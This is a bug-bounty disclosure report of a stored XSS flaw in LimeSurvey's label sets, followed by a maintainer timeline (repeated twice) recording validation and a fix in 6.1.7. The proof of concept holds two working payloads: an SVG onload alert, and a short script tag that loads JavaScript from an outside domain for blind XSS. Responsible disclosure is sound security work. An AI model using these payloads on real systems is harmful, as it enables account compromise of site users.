Stored XSS in label function in limesurvey/limesurvey

Valid

Reported on

Jun 28th 2023

Description

By Injecting the payloads to the fields (dataToSend), users who visited "Label sets list" screen maybe compromises

Proof of Concept

Step 1: Login as a user who has permission to edit the Label. Go to the label function and view a label Step 2: Inject the payload to the Code field as the image below and click save.

<svg onload=alert()>

Step 3: The payload is then triggered

However, the maximum length of the field is 20. I still can exploit this vulnerability with this payload for a blind XSS:

<script src=//₨₨.pw>

Reference

Impact

If an attacker can control a script that is executed in the victim's browser, then they can typically fully compromise that user. The attacker can carry out any of the actions that are applicable to the impact of reflected XSS vulnerabilities.

We are processing your report and will contact the limesurvey team within 24 hours. 3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

We have contacted a member of the limesurvey team and are waiting to hear back 3 months ago

Carsten Schmitz

commented 3 months ago

Maintainer

Please be patient while we verify the issue. Internal reference number: #18934

tuannq2299

commented 3 months ago

Researcher

Is there any update?

Carsten Schmitz modified the Severity from High (7.1) to Medium (4.6) 2 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Carsten Schmitz validated this vulnerability 2 months ago

tuannq2299 has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carsten Schmitz marked this as fixed in 6.1.7 with commit 184d50 2 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Carsten Schmitz published this vulnerability 2 months ago

to join this conversation

We are processing your report and will contact the limesurvey team within 24 hours. 3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

tuannq2299 modified the report

3 months ago

We have contacted a member of the limesurvey team and are waiting to hear back 3 months ago

Carsten Schmitz

commented 3 months ago

Maintainer

Please be patient while we verify the issue. Internal reference number: #18934

tuannq2299

commented 3 months ago

Researcher

Is there any update?

Carsten Schmitz modified the Severity from High (7.1) to Medium (4.6) 2 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Carsten Schmitz validated this vulnerability 2 months ago

tuannq2299 has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Carsten Schmitz marked this as fixed in 6.1.7 with commit 184d50 2 months ago

The fix bounty has been dropped

This vulnerability will not receive a CVE

Carsten Schmitz published this vulnerability 2 months ago

to join this conversation